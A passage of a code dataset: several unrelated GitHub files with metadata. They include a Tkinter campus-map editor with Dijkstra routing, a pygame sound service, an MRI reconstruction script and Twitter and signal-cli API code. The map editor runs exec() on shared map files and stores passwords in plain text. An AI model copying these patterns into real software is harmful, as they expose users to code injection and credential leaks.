\"browse\"): \n data.screen = \"browse\"\n elif(buttonId == \"home\"):\n data.screen = \"home\"\n data.image = None\n data.map = Map()\n data.path = None\n data.circs = []\n\ndef save(data):\n #Save map to txt file\n #Dialog code taken from Misc Tkinter Demos on Course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n titleFile = \"SAVE\"\n msgFile = \"What would you like to save this map as (include .txt)\"\n data.fileName = simpledialog.askstring(titleFile, msgFile)\n data.fileName = data.user + \"_\" + data.fileName\n #File IO Code taken from string notes in course Webpage\n #https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\n with open(data.fileName, \"wt\") as f:\n f.write(data.mapStr)\n userDict[data.userkey].add(data.fileName)\n with open(\"users.txt\", \"wt\") as f:\n f.write(repr(userDict))\n\ndef mousePressed(event, data):\n #Manipulate the map depending on the mode\n if(data.screen == \"edit\"):\n #Save button clicked\n if((data.width - 80 < event.x) and (event.x < data.width) and \n (data.height - 40 < event.y) and (event.y < data.height)):\n save(data)\n if((0= node.x-data.r)and \n (event.y <= node.y+data.r)and(event.y >= node.y-data.r)):\n if(node == data.start):\n data.start = None\n data.circs = []\n data.path = None\n return\n if(data.start == None):\n #Set start node for dijkstra\n data.start = node\n data.circs.append((node.x, node.y))\n elif(data.end == None):\n #Set end node for dijkstra\n data.end = node\n data.path = data.map.dijkstra(data.start, data.end, \n data.pathindex)\n data.circs.append((node.x, node.y))\n if(data.path == \"error\"):\n #Path not possible, notiy user and reset data.end\n data.end = None \n data.circs.pop()\n data.path = None\n #Warning box from Misc Tkinter Demos, course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n msg = \"The node you are trying to reach is not\"\n msg += \" connected to the node previously selected\"\n messagebox.showwarning(\"ERROR: INVALID PATH\", msg)\n return\n else:\n #Reset with new start\n data.start = node\n data.end = None\n data.path = []\n data.circs = [(node.x, node.y)]\n elif(data.screen == \"browse\"):\n findClick(data, event.x, event.y)\n\ndef findClick(data, x, y):\n #Determines which file was clicked\n #File IO code taken from course webpage for strings notes\n #https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\n for i in range(len(data.fileSpots1)):\n (x1, y1, x2, y2) = data.fileSpots1[i]\n if((x1 < x) and (x < x2) and (y1 < y) and (y < y2)):\n found = data.userList[i]\n if(found == data.clicked):\n #Second Click\n with open(data.clicked, \"rt\") as f:\n #Update data.mapStr\n data.mapStr = f.read()\n data.map = Map()\n data.path = None\n data.image = None\n #Get user preferences again\n #Taken from Misc Tkinter Demos on Course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n msgW = \"How much do you want to walk outdoors?\"\n msgS = \"Are stairs an issue?\"\n titleW = \"WEATHER\"\n titleS = \"ACCESSIBILITY\"\n optionsW = [\"I'd like to walk outside\", \"It doesn't matter\"]\n optionsW.append(\"I'd like to walk inside\")\n optionsS = [\"I don't mind stairs\"]\n optionsS.append(\"I'd rather not traverse stairs\")\n optionsS.append(\"Avoid stairs\")\n responseW = choose(msgW, titleW, optionsW)\n responseS = choose(msgS, titleS, optionsS)\n data.wp = responseW - 2\n data.sp = responseS - 1\n exec(data.mapStr.replace(\"!\", \"\\'\"))\n data.nextchar=chr(ord(\"a\")+(len(data.map.nodes)%26))\n data.screen = \"edit\"\n useAPIOnce()\n else:\n #First Click\n data.clicked = found\n return\n for i in range(len(data.fileSpots2)):\n (x1, y1, x2, y2) = data.fileSpots2[i]\n if((x1 < x) and (x < x2) and (y1 < y) and (y < y2)):\n found = data.otherList[i]\n if(found == data.clicked):\n #Second Click\n with open(data.clicked, \"rt\") as f:\n #Update data.mapStr\n data.mapStr = f.read()\n data.map = Map()\n data.path = None\n data.image = None\n #Taken from Misc Tkinter Demos on Course webpage\n #https://www.cs.cmu.edu/~112/notes/dialogs-demo1.py\n #Get user preferences again\n msgW = \"How much do you want to walk outdoors?\"\n msgS = \"Are stairs an issue?\"\n titleW = \"WEATHER\"\n titleS = \"ACCESSIBILITY\"\n optionsW = [\"I'd like to walk outside\", \"It doesn't matter\"]\n optionsW.append(\"I'd like to walk inside\")\n optionsS = [\"I don't mind stairs\"]\n optionsS.append(\"I'd rather not traverse stairs\")\n optionsS.append(\"Avoid stairs\")\n responseW = choose(msgW, titleW, optionsW)\n responseS = choose(msgS, titleS, optionsS)\n data.wp = responseW - 2\n data.sp = responseS - 1\n exec(data.mapStr.replace(\"!\", \"\\'\"))\n data.nextchar=chr(ord(\"a\")+(len(data.map.nodes)%26))\n data.screen = \"edit\"\n useAPIOnce()\n \n else:\n #First Click\n data.clicked = found\n return\n #Nothing was clicked\n data.clicked = None\n\ndef keyPressed(event, data):\n #Change mode depending on key press\n if(data.screen == \"edit\"):\n if((data.mode == \"node\") and (event.char == \"n\")):\n #Unselect mode\n data.mode = \"\"\n return\n if((data.mode == \"edge\") and (event.char == \"e\")):\n #Unelect mode\n data.mode = \"\"\n return\n #Change mode\n if(event.char == \"n\"):\n data.mode = \"node\"\n elif(event.char == \"e\"):\n data.mode = \"edge\"\n if(data.mode == \"node\"):\n #Undo/redo for nodes\n if(event.char == \"u\"):\n data.undoN.append(data.map.nodes.pop())\n if((event.char == \"r\") and (data.undoN != [])):\n data.map.nodes.add(data.undoN.pop())\n #Change weighting preference and calculate new path\n if(event.keysym == \"Left\"):\n data.pathindex = (data.pathindex - 1) % 3\n if((data.path != None) and (data.start != None) and \n (data.end != None)):\n data.path = data.map.dijkstra(data.start, data.end, \n data.pathindex)\n if(event.keysym == \"Right\"):\n data.pathindex = (data.pathindex + 1) % 3\n if((data.path != None) and (data.start != None) and \n (data.end != None)):\n data.path = data.map.dijkstra(data.start, data.end, \n data.pathindex)\n\ndef timerFired(data, canvas):\n #Redraw new random home background\n if(data.screen == \"home\" or data.screen == \"browse\"):\n drawBackground(data, canvas)\n\ndef drawBackground(data, canvas):\n #Draws opaque gray background on home screen\n for i in range(50):\n x1 = random.randint(-5 * data.width, 0)\n x2 = random.randint(0, 5 * data.width)\n y1 = random.randint(-5 * data.height, 0)\n y2 = random.randint(0, 5 * data.height)\n canvas.create_line(x1, y1, x2, y2, fill = \"lavender\", width = 5)\n\ndef redrawAll(canvas, data):\n #Draw front end\n if(data.screen == \"home\"):\n #Print title and directions\n drawBackground(data, canvas)\n canvas.create_text(data.width//2, data.height//2-100, text=\"PYTHONEAS\",\n font = \"Times 96\")\n directions1 = \"Create custom maps or edit existing ones\"\n directions2 = \"with shortest mapping capabilities via Dijkstra's\"\n directions2 += \" Algorithm.\"\n directions3 = \"Go deeper than distance with custom weighting options\"\n directions4 = \"such as weather and accessibility to find multiple \"\n directions4 += \"viable paths.\"\n directsb=\"Click \\'Browse\\' to open maps created by you and other users.\"\n directse = \"Click \\'Edit\\' to start a new map from scratch.\"\n canvas.create_text(data.width//2, data.height//2 + 30, text=directions1,\n font = \"Times 20\")\n canvas.create_text(data.width//2, data.height//2 + 50, text=directions2,\n font = \"Times 20\")\n canvas.create_text(data.width//2, data.height//2 + 70, text=directions3,\n font = \"Times 20\")\n canvas.create_text(data.width//2, data.height//2 + 90, text=directions4,\n font = \"Times 20\")\n canvas.create_text(data.width//2, data.height//2 + 110, text=directsb,\n font = \"Times 20\")\n canvas.create_text(data.width//2, data.height//2 + 130, text=directse,\n font = \"Times 20\")\n #Sign in\n if(data.user == None):\n titleUse = \"USER\"\n msgUse = \"Enter your username:\"\n data.user = simpledialog.askstring(titleUse, msgUse)\n titlePass = \"PASSWORD\"\n msgPass = \"Enter your password:\"\n data.password = simpledialog.askstring(titlePass, msgPass)\n data.userkey = data.user + data.password\n if(data.userkey not in userDict):\n userDict[data.userkey] = set()\n #File IO code taken from strings section of course wedbapge\n #https://www.cs.cmu.edu/~112/notes/notes-strings.html#basicFileIO\n with open(\"users.txt\", \"wt\") as f:\n f.write(repr(userDict))\n\n elif(data.screen == \"edit\"):\n #Draw grid/pic\n drawGrid(canvas, data)\n if(data.image != \"grid\"):\n canvas.create_image(data.width//2, data.height//2, image=data.image)\n #Draw elements\n drawCircs(canvas, data)\n drawEdges(canvas, data, data.pathindex)\n drawNodes(canvas, data)\n if(data.path != None):\n drawPath(canvas, data)\n #Print directions\n directions5 = \"N - Node Mode\"\n directions5 += \"\\nE - Edge Mode\"\n canvas.create_text(5, 5, text = directions5, anchor = NW, \n font = \"Times 16\")\n if(data.mode == \"node\"):\n nodedir = \"Click where you wish to add a node\"\n nodedir2 = \"\\nPress N to exit Node Mode\"\n canvas.create_text(data.width-40, 20, text=\"NODE\", font=\"Times 18\")\n canvas.create_text(data.width, 60, text = nodedir,\n anchor = SE, font = \"Times 16\")\n canvas.create_text(data.width, 80, text = nodedir2,\n anchor = SE, font = \"Times 16\")\n elif(data.mode == \"edge\"):\n edgedir = \"Click 2 nodes you wish to connect with an edge\"\n edgedir2 = \"\\nPress E to exit Edge Mode\"\n canvas.create_text(data.width-40, 20, text=\"EDGE\", font=\"Times 18\")\n canvas.create_text(data.width, 60, text = edgedir,\n anchor = SE, font = \"Times 16\")\n canvas.create_text(data.width, 80, text = edgedir2,\n anchor = SE, font = \"Times 16\")\n else:\n dijkdir = \"Click a start node and an end node\"\n dijkdir2 = \"\\nClick the node again to undo your selection\"\n canvas.create_text(data.width, 60, text = dijkdir,\n anchor = SE, font = \"Times 16\")\n canvas.create_text(data.width, 80, text = dijkdir2,\n anchor = SE, font = \"Times 16\")\n options = [\"DISTANCE\", \"WEATHER\", \"ACCESSIBILITY\"]\n canvas.create_text(data.width - 60, 20,\n text = options[data.pathindex], font =\"Times 16\")\n canvas.create_line(data.width - 198, 20, data.width - 122, 20, \n fill = data.hlcolors[data.pathindex], width = 5)\n #Print Buttons\n canvas.create_rectangle(data.width-80, data.height-40, data.width, \n data.height, fill = \"Black\")\n canvas.create_text(data.width - 40, data.height - 20, text = \"SAVE\",\n font = \"Times 16\", fill = \"White\")\n rectBounds = [(2, 42, 158, 78), (1, 82, 158, 118), (2, 122, 158, 158)]\n canvas.create_rectangle(rectBounds[data.pathindex], \n fill = data.hlcolors[data.pathindex])\n canvas.create_rectangle(5, 45, 155, 75, fill = \"black\")\n canvas.create_rectangle(5, 85, 155, 115, fill = \"black\")\n canvas.create_rectangle(5, 125, 155, 155, fill = \"black\")\n butcs = [\"white\"]*3\n #Highlight clicked preference\n butcs[data.pathindex] = data.hlcolors[data.pathindex]\n canvas.create_text(80,60,text=\"DISTANCE\",font=\"Times 14\",fill=butcs[0])\n canvas.create_text(80,100,text=\"WEATHER\",font=\"Times 14\",fill=butcs[1])\n canvas.create_text(80,140,text=\"ACCESSIBILITY\",font=\"Times 14\",\n fill=butcs[2])\n elif(data.screen == \"browse\"):\n drawBackground(data, canvas)\n #Print files\n colSpot = data.width//4\n canvas.create_text(colSpot,20,text=\"YOUR MAPS\",font=\"Times 30\")\n canvas.create_text(3*colSpot,20,text=\"OTHER MAPS\",font=\"Times 30\")\n spacing1 = 75\n #Find margins for clicking purposes\n xm = 125\n ym = 20\n data.userList = list(userDict[data.userkey])\n for file in userDict[data.userkey]:\n #Highlight after one click\n if(file == data.clicked):\n colr = \"blue\"\n else:\n colr = \"black\"\n canvas.create_text(colSpot,spacing1,text=file,font=\"Times 20\",\n fill = colr)\n tup = (colSpot-xm,spacing1-ym,colSpot+xm,spacing1+ym)\n if(tup not in data.fileSpots1):\n data.fileSpots1.append(tup)\n spacing1 += 25\n spacing2 = 75\n t = 3*colSpot\n for user in userDict:\n if(user != data.userkey):\n for file in userDict[user]:\n #Highlight after one click\n if(file not in data.otherList):\n data.otherList.append(file)\n if(file == data.clicked):\n colr = \"blue\"\n else:\n colr = \"black\"\n canvas.create_text(t,spacing2,text=file,font=\"Times 20\",\n fill = colr)\n tup = (t-xm,spacing2-ym,t+xm,spacing2+ym)\n if(tup not in data.fileSpots2):\n data.fileSpots2.append(tup)\n spacing2 += 25\n browseDirections = \"Double Click to open a file\"\n canvas.create_text(data.width, data.height, text = browseDirections,\n font = \"Times 16\", anchor = SE)\n #Display Weather Underground Logo as per their requirements\n #Code taken from Misc Tkinter Demos from course webpage\n #https://www.cs.cmu.edu/~112/notes/imagesDemo1.py\n canvas.create_image(0, data.height, anchor = SW, image = data.wuimage)\n\ndef drawGrid(canvas, data):\n #Draw Background grid for edit screen\n for i in range(data.gridSpacing, data.width, data.gridSpacing):\n canvas.create_line(i, 0, i, data.height, fill = \"light sky blue\")\n for j in range(data.gridSpacing, data.height, data.gridSpacing):\n canvas.create_line(0, j, data.width, j, fill = \"light sky blue\")\n\ndef drawCircs(canvas, data):\n #Show start and end node\n rad = data.r + 5\n for circ in data.circs:\n canvas.create_oval(circ[0] - rad, circ [1] - rad, circ[0] + rad,\n circ[1] + rad, fill = \"seashell4\")\n \ndef drawNodes(canvas, data, col = \"black\", txt = \"white\"):\n #Draw all nodes with labels\n for node in data.map.nodes:\n canvas.create_oval(node.x - data.r, node.y - data.r, node.x + data.r, \n node.y + data.r, fill = col)\n #canvas.create_text(node.x, node.y, text = str(node.name), \n #font = \"Times 16\", fill = txt)\n\ndef drawEdges(canvas, data, i = 0, txt = \"grey\"):\n #Draw all edges with labels\n for node in data.map.nodes:\n for adj in node.adjs:\n [x1, y1, x2, y2] = node.adjs[adj].getCoords()\n if((data.pathindex == 2) and (node.adjs[adj].weights[2]==math.inf)):\n #Make red if stairs and wished to be avoided\n canvas.create_line(x1, y1, x2, y2, fill = \"red\")\n else:\n canvas.create_line(x1, y1, x2, y2, fill = \"black\")\n (x, y) = ((x1+x2)/2, (y1+y2)/2)\n if(node.adjs[adj].weights[data.pathindex] == math.inf):\n t = \"inf\"\n else:\n t = str(int(node.adjs[adj].weights[data.pathindex]))\n canvas.create_text(x, y, text = t, fill = txt, font = \"Times 10\")\n\ndef drawPath(canvas, data):\n #Draw the path\n drawPathEdges(canvas, data, data.pathindex)\n drawPathNodes(canvas, data)\n\ndef drawPathEdges(canvas, data, ind = 0):\n #Highlight edges in path\n for i in range(0, len(data.path) - 1):\n node1 = data.path[i]\n node2 = data.path[i+1]\n [x1, y1, x2, y2] = [node1.x, node1.y, node2.x, node2.y]\n #Use different colors for highlight\n canvas.create_line(x1, y1, x2, y2, fill = data.hlcolors[data.pathindex],\n width = 10)\n (x, y) = ((x1+x2)/2, (y1+y2)/2)\n if(node1.adjs[node2].weights[data.pathindex] == math.inf):\n t = \"inf\"\n else:\n t = str(int(node1.adjs[node2].weights[data.pathindex]))\n canvas.create_rectangle(x - 10, y - 5, x + 10, y + 5, fill = \"black\")\n canvas.create_text(x, y,text = t, fill = data.hlcolors[data.pathindex],\n font = \"Times 10\")\n\ndef drawPathNodes(canvas, data):\n #Highlight nodes in path\n for node in data.path:\n #Use different colors for highlight\n canvas.create_oval(node.x - data.r, node.y - data.r, node.x + data.r, \n node.y + data.r, fill=data.hlcolors[data.pathindex])\n #canvas.create_text(node.x, node.y, text = str(node.name), \n #font = \"Times 16\", fill = \"black\")\n\ndef run(width=300, height=300):\n #Taken from course webpage\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update() \n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data, canvas)\n redrawAllWrapper(canvas, data)\n # pause, then call timerFired again\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n # Set up data and call init\n class Struct(object): pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 3000 # milliseconds\n\n # create the root and the canvas (Note Change: do this BEFORE calling init!)\n root = Tk()\n\n #For buttons to access root\n data.root = root\n\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n # set up events\n root.bind(\"\", lambda event:\n mousePressedWrapper(event, canvas, data))\n root.bind(\"\", lambda event:\n keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n # and launch the app\n root.mainloop() # blocks until window is closed\n\n print(\"bye!\")\nrun(1000, 600)","repo_name":"ChrisWallace2020/Pythoneas","sub_path":"Pyhtoneas.py","file_name":"Pyhtoneas.py","file_ext":"py","file_size_in_byte":39170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74886237924","text":"import random\n\nimport pygame\n\nfrom paths import AUDIO_DIR\n\n\nclass MusicService:\n @staticmethod\n def get_background_musics():\n return [\n #AUDIO_DIR / \"CookieGameOST_menu.mp3\",\n #AUDIO_DIR / \"CookieGameOST_game.mp3\",\n AUDIO_DIR / \"game1.mp3\",\n AUDIO_DIR / \"game2.mp3\",\n AUDIO_DIR / \"game3.mp3\",\n AUDIO_DIR / \"game4.mp3\",\n AUDIO_DIR / \"game5.mp3\"\n ]\n\n @staticmethod\n def get_chop_musics():\n return [\n AUDIO_DIR / \"chop.wav\",\n AUDIO_DIR / \"chop_2.wav\",\n AUDIO_DIR / \"chop_3.wav\"\n ]\n\n @staticmethod\n def get_cheer_musics():\n return [\n AUDIO_DIR / \"cheer.wav\",\n AUDIO_DIR / \"cheer_2.wav\",\n AUDIO_DIR / \"cheer_3.wav\",\n AUDIO_DIR / \"cheer_4.wav\"\n ]\n\n @staticmethod\n def get_death_sound():\n return [\n AUDIO_DIR / \"hit1.mp3\",\n AUDIO_DIR / \"hit2.mp3\"\n ]\n\n @staticmethod\n def start_background_music():\n if pygame.mixer.music.get_busy():\n return\n\n musics = MusicService.get_background_musics()\n\n filename = random.choice(musics)\n pygame.mixer.music.load(filename)\n pygame.mixer.music.play()\n\n @staticmethod\n def play_chop_sound():\n musics = MusicService.get_chop_musics()\n filename = random.choice(musics)\n chop = pygame.mixer.Sound(filename)\n pygame.mixer.Sound.play(chop)\n\n @staticmethod\n def play_score_sound():\n score_sfx = pygame.mixer.Sound(AUDIO_DIR / \"score.wav\")\n pygame.mixer.Sound.play(score_sfx)\n\n @staticmethod\n def play_gift_spawn_sound():\n gspawn_sfx = pygame.mixer.Sound(AUDIO_DIR / \"spawngift.wav\")\n pygame.mixer.Sound.play(gspawn_sfx)\n\n @staticmethod\n def play_gift_bonus_sound():\n gbonus_sfx = pygame.mixer.Sound(AUDIO_DIR / \"bonussound.wav\")\n pygame.mixer.Sound.play(gbonus_sfx)\n\n @staticmethod\n def play_slap_sound():\n slap_sfxs = MusicService.get_death_sound()\n deathfile = pygame.mixer.Sound(random.choice(slap_sfxs))\n pygame.mixer.Sound.play(deathfile)\n\n @staticmethod\n def play_cheer_sound():\n musics = MusicService.get_cheer_musics()\n filename = random.choice(musics)\n cheer = pygame.mixer.Sound(filename)\n pygame.mixer.Sound.play(cheer)\n","repo_name":"GDcocos12/SaveTheCookie","sub_path":"src/services/music_service.py","file_name":"music_service.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5279871505","text":"#1080 행렬\nimport sys\nN,M = map(int, sys.stdin.readline().split())\nA = [list(map(int, list(sys.stdin.readline().strip()))) for _ in range(N)]\nB = [list(map(int, list(sys.stdin.readline().strip()))) for _ in range(N)]\nans = 0\nsub = [(0,0),(0,1),(0,2),(1,0),(1,1),(1,2),(2,0),(2,1),(2,2)] # 현 위치 기준으로 3*3\nfor i in range(N-2):\n for j in range(M-2):\n if A[i][j] != B[i][j]: # 현 위치의 값이 A,B에서 서로 다르면 3*3 행렬변환연산\n for k in range(len(sub)):\n y = i+sub[k][0]\n x = j+sub[k][1]\n if y >= 0 and x >= 0 and y < N and x < M:\n B[y][x] = 1 - B[y][x] # 1 -> 0, 0 -> 1\n ans += 1\nfor i in range(N):\n for j in range(M):\n if A[i][j] != B[i][j]:\n ans = -1\n break\nprint(ans)","repo_name":"Kim-Hyunjo/algorithm","sub_path":"study1/BOJ_1080.py","file_name":"BOJ_1080.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"12744384785","text":"import gn_flavor\n\n\n\"\"\"Utils for running under Valgrind.\"\"\"\n\n\nclass ValgrindFlavorUtils(gn_flavor.GNFlavorUtils):\n def __init__(self, m):\n super(ValgrindFlavorUtils, self).__init__(m)\n self._suppressions_file = self.m.path['start_dir'].join(\n 'skia', 'tools', 'valgrind.supp')\n self._valgrind_cipd_dir = self.m.vars.slave_dir.join('valgrind')\n self._valgrind_fake_dir = self._valgrind_cipd_dir\n self._valgrind = self._valgrind_fake_dir.join('bin', 'valgrind')\n self._lib_dir = self._valgrind_fake_dir.join('lib', 'valgrind')\n\n def step(self, name, cmd, **kwargs):\n new_cmd = [self._valgrind, '--gen-suppressions=all', '--leak-check=full',\n '--track-origins=yes', '--error-exitcode=1', '--num-callers=40',\n '--suppressions=%s' % self._suppressions_file]\n path_to_app = self.m.vars.skia_out.join(cmd[0])\n new_cmd.append(path_to_app)\n new_cmd.extend(cmd[1:])\n with self.m.env({'VALGRIND_LIB': self._lib_dir}):\n return self.m.run(self.m.step, name, cmd=new_cmd, **kwargs)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/skia/infra/bots/recipe_modules/flavor/valgrind_flavor.py","file_name":"valgrind_flavor.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"14969568842","text":"from typing import Any, List\n\nfrom fastapi import APIRouter\n\nfrom signal_cli_rest_api.app.config import settings\nfrom signal_cli_rest_api.app.schemas import GroupCreate, GroupOut, GroupUpdate\nfrom signal_cli_rest_api.app.utils import (read_groups, run_signal_cli_command,\n save_attachment)\n\nrouter = APIRouter()\n\n\n@router.get(\"/{number}\", response_model=List[GroupOut])\nasync def get_groups(number: str, detailed: bool = False) -> Any:\n \"\"\"\n get groups\n \"\"\"\n\n cmd = [\"-u\", number, \"listGroups\"]\n\n if detailed:\n cmd.append(\"-d\")\n\n response = await run_signal_cli_command(cmd)\n\n groups = read_groups(response)\n\n return groups\n\n\n@router.post(\"/{number}\", status_code=201, response_model=GroupOut)\nasync def create_group(group: GroupCreate, number: str) -> Any:\n \"\"\"\n Create Group\n \"\"\"\n\n cmd = [\"updateGroup\", \"-n\", group.name]\n\n if group.avatar:\n cmd.append(\"-a\")\n await save_attachment(group.avatar)\n cmd.append(f\"{settings.signal_upload_path}{group.avatar.filename}\")\n\n cmd += [\"-m\"]\n cmd += group.members\n\n response = await run_signal_cli_command(cmd)\n\n return GroupOut(**group.dict(), id=response.split('\"')[1])\n\n\n@router.put(\"/{number}/{id}\", response_model=GroupOut)\nasync def edit_group(id: str, group: GroupUpdate, number: str) -> Any:\n \"\"\"\n Edit a group. You can't remove a member from a group\n \"\"\"\n\n cmd = [\"-u\", number, \"updateGroup\", \"-g\", id]\n\n if group.name:\n cmd += [\"-n\", group.name]\n\n if group.avatar:\n cmd.append(\"-a\")\n await save_attachment(group.avatar)\n cmd.append(f\"{settings.signal_upload_path}{group.avatar.filename}\")\n\n if len(group.members) > 0:\n cmd += [\"-m\"]\n cmd += group.members\n\n await run_signal_cli_command(cmd)\n\n return GroupOut(**group.dict(), id=id)\n\n\n@router.delete(\"/{number}/{id}\")\nasync def leave_group_by_id(id: str, number: str) -> Any:\n \"\"\"\n leave a group by id\n \"\"\"\n\n cmd = [\"-u\", number, \"quitGroup\", \"-g\", id]\n\n await run_signal_cli_command(cmd)\n\n return id\n","repo_name":"React-Automation-Studio/React-Automation-Studio","sub_path":"signalcli/signal_cli_rest_api/app/api/api_v1/endpoints/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"52"} +{"seq_id":"28873667825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on %(date)s\n\n@author: %(username)s\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport logging\nimport json\nimport base64\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\nfrom requests.exceptions import HTTPError\n\n\n# set argument parser\nparser = argparse.ArgumentParser(description='Get junior faculty for each school.')\nparser.add_argument(\"-outdir\", type = str,\n help = \"Directory to store output of this file.\",\n default = \"data/friends\")\nparser.add_argument(\"-v\", \"--verbose\", \n help = \"Set logging level to DEBUG.\",\n action = \"store_true\")\nargs = parser.parse_args()\n\n# set logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.ERROR)\nif args.verbose:\n log.setLevel(logging.DEBUG)\nloghandler = logging.StreamHandler(sys.stderr)\nloghandler.setFormatter(logging.Formatter(\"[%(asctime)s %(message)s]\"))\nlog.addHandler(loghandler)\n\n\"\"\" STEP 0: OAuth2 Authorization \"\"\"\n\n# Load my credentials from json file\nclient_key = os.getenv('twitter_api_key')\nclient_secret = os.getenv('twitter_api_secret')\n\n# Encode my keys in base64 per instructed on \n# https://developer.twitter.com/en/docs/basics/authentication/overview/application-only\nkey_secret = '{}:{}'.format(client_key, client_secret).encode('ascii')\nb64_encoded_key = base64.b64encode(key_secret)\nb64_encoded_key = b64_encoded_key.decode('ascii')\n\n# Build authorization request \nauth_url = 'https://api.twitter.com/oauth2/token'\nauth_headers = {\n 'Authorization': 'Basic {}'.format(b64_encoded_key),\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'}\nauth_data = {'grant_type': 'client_credentials'}\nauth_resp = requests.post(auth_url, headers=auth_headers, data=auth_data)\n\n# Check status code is 200, meaning \"okay\"\nif auth_resp.status_code != 200:\n log.error(\"Authorization status code: {}\".format(auth_resp.status_code))\nelse:\n log.info(\"Authorization request successful\")\n\n# Store access token\naccess_token = auth_resp.json()['access_token']\n\n\"\"\" STEP 1 \"\"\"\ndef build_APIrequest(count = 0, cursor = -1):\n \"\"\"\n Builds API request url and retrieves response json, which is saved to file.\n ----\n count (int, current result page number)\n cursor (int)\n \"\"\"\n base_url = \"https://api.twitter.com/1.1/friends/ids.json\"\n search_headers = {'Authorization': 'Bearer {}'.format(access_token)}\n params = {\"screen_name\": \"PizzaToThePolls\",\n \"count\": 5000, \n \"cursor\": cursor}\n try:\n response = requests.get(base_url, params = params, headers = search_headers)\n response.raise_for_status()\n except HTTPError as http_err:\n log.error(f'HTTP error occurred: {http_err}') # Python 3.6\n except Exception as err:\n log.error(f'Other error occurred: {err}') # Python 3.6\n else:\n log.info('Success!')\n \n \n # Save to file\n friends = response.json()\n with open(os.path.join(args.outdir, \"friends\" + str(count) + \".json\"), \"w\") as j:\n json.dump(friends, j)\n \n # If next cursor exists, return next cursor\n if friends['next_cursor'] != 0:\n log.info(\"There's next page!\")\n next_ = friends['next_cursor']\n return next_\n else:\n log.info(\"Reached last page!\")\n return 0 \n\n\"\"\" STEP 2\"\"\"\ndef lookup_friend(friends_, count):\n \"\"\"\n Look ups the friend with user id given by `friend_id `and \n gretrieves the user object, which is saved as json file.\n ------\n friend_id (int, user id of the friend to look up)\n \"\"\"\n \n \n # convert friends_ to a comma-separated character string \n friends = ','.join([str(f) for f in friends_])\n \n \n base_url = \"https://api.twitter.com/1.1/users/lookup.json\"\n search_headers = {'Authorization': 'Bearer {}'.format(access_token)}\n params = {\"user_id\": friends}\n \n try:\n response = requests.get(base_url, params = params, headers = search_headers)\n response.raise_for_status()\n except HTTPError as http_err:\n log.error(f'HTTP error occurred: {http_err}') # Python 3.6\n except Exception as err:\n log.error(f'Other error occurred: {err}') # Python 3.6\n else:\n log.info('Success!')\n \n # Save user object to file\n users_ = response.json()\n filename = os.path.join(args.outdir, \"friends_lookup_\" + str(count) + \".json\")\n with open(filename, \"w\") as j:\n json.dump(users_, j)\n log.info(\"Saved response to {}\".format(filename))\n \n \n \n\n \n \nif __name__ == \"__main__\":\n \n c = 0\n next_ = build_APIrequest(count = c)\n while next_ != 0:\n c += 1\n next_ = build_APIrequest(count = c, cursor = next_)\n \n def chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n \n with open(os.path.join(args.outdir, \"friends0.json\"), \"r\") as j:\n friends_list = list(chunks(json.load(j)[\"ids\"], 100))\n for i, f in enumerate(friends_list):\n lookup_friend(f, i)\n \n sys.exit()","repo_name":"amikami102/pizza_to_the_polls","sub_path":"script/friends_of_PTTP/get_friends.py","file_name":"get_friends.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8570421985","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 29 14:38:26 2019\n\n@author: mzaiss\n\nexperiment desciption:\n\n2D imaging: GRE with spoilers and random phase cycling\n# target is fully relaxed GRE (FA5), task is FLASH with TR>=12ms\n\"\"\"\n\nimport os, sys\nimport numpy as np\nimport pickle\nimport scipy\nimport scipy.io\n\n\npath = '../out'\nexperiment_id = 'FLASH_spoiled_lowSAR_test_sunday'\n\n#path = 'K:\\CEST_seq\\pulseq_zero\\sequences'\n#experiment_id = 'FLASH_spoiled_lowSAR64_400spins_multistep'\n\n\n\nwith open(os.path.join(path,experiment_id,'param_reco_history.pdb'), 'rb') as handle:\n b = pickle.load(handle)\n\nNIter = len(b[0])\nsz = np.int(np.sqrt(b[0][0]['reco_image'].shape[0]))\n\nNRep = sz\nT = sz + 4\n\nif sz == 64:\n event_time = 0.2*1e-3*np.ones((T,NRep))\n event_time[1,:] = 3*1e-3\n event_time[-2,:] = 3*1e-3 \nelse:\n event_time = 